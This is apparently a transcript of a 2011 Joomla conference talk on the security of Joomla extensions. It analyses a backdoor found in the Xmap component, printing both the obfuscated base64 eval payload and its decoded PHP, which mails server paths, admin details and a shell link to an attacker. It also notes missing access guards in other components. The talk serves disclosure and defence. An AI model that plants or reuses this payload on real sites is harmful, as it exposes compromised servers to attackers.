jira ict - how safe are joomla! extenties #jd11nl
DESCRIPTION
How safe are Joomla! extenties #jd11nlJoomladagen NL 2011TRANSCRIPT
How save are Joomla extenties? @jd11nl
How safe are Joomla extenties?Case: Xmap
By Ray Bogman
Jira ICT www.jira.nl - @jiraictYireo www.yireo.com - @yireo
How save are Joomla extenties? @jd11nl
Xmap jeopardized?
How save are Joomla extenties? @jd11nl
Where are you jeopardized?
install.xmap.phpslider.css.php
<?php eval("?>".base64_decode("PD9waHANCiRraW1lPSJhbWVuc2VtaWhAZ21haWwuY29tIjsNCiRiYXNsaWs9IkVMX011SGFNTWVEIFNlcnZlciBBdmNpc2kgVjEuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw0KPz4=")); ?>
How save are Joomla extenties? @jd11nl
Notifying the Hacker would be nice
<?php$kime="[email protected]";$baslik="EL_MuHaMMeD Server Avcisi V1.0";$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";mail($kime, $baslik, $EL_MuHaMMeD);?>
How save are Joomla extenties? @jd11nl
So what's next?
How save are Joomla extenties? @jd11nl
Is there a backdoor?
How save are Joomla extenties? @jd11nl
Get your Joomla! login for Free!
How save are Joomla extenties? @jd11nl
_JEXEC or die
•com_agora.php•com_eventlist.php•com_glossary.php•com_joomgallery.php•com_kunena.php
defined( '_JEXEC' ) or die( 'Restricted access.' );
missing in current version
How save are Joomla extenties? @jd11nl
Thank [email protected]
#jiraict
www.jira.nlhttp://www.slideshare.net/jiraicthttp://www.facebook.com/jiraict